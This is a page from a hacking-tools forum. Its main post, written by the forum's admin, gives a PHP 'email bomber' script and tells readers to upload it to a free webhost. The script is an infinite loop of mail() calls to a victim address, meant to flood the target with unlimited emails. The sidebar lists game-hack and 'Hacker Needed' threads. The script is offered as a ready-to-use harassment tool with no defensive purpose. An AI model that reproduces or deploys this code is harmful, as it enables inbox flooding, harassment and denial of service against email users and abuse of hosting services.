www.i4info.org

Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2017
Email Bomber [PHP] EmptySat Apr 29, 2017 10:50 am by ubedullah

» Group hackers
Email Bomber [PHP] EmptySat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
Email Bomber [PHP] EmptySat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
Email Bomber [PHP] EmptySat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
Email Bomber [PHP] EmptyThu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
Email Bomber [PHP] EmptyTue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
Email Bomber [PHP] EmptyTue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
Email Bomber [PHP] EmptyTue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
Email Bomber [PHP] EmptyTue Apr 11, 2017 1:35 am by Group Hackers

May 2024

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


    Email Bomber [PHP]

    Admin
    Admin
    Admin


    Posts : 474
    Reputation : 8
    Join date : 2014-12-10
    Age : 31
    Location : Pakistan

    Email Bomber [PHP] Empty Email Bomber [PHP]

    Post by Admin Wed Mar 04, 2015 7:47 pm

    A very basic, yet effective E-Mail bomber that sends an unlimited amount of emails to the target.

    How to:


    Copy-Paste this code into notepad, save it as a .php file, and then upload to your free webhoster.


    Note: This will work fine if your webhost has a mail server on it. If not, then this code is useless.


    CODE:

    <?php
    $i =1;
    do {
    mail("victim@host.com", "Your Subject", "Your Message", "From: [You must be registered and logged in to see this link.]");
    } while ($i > 0);
    ?>





     

      Current date/time is Mon May 20, 2024 11:01 pm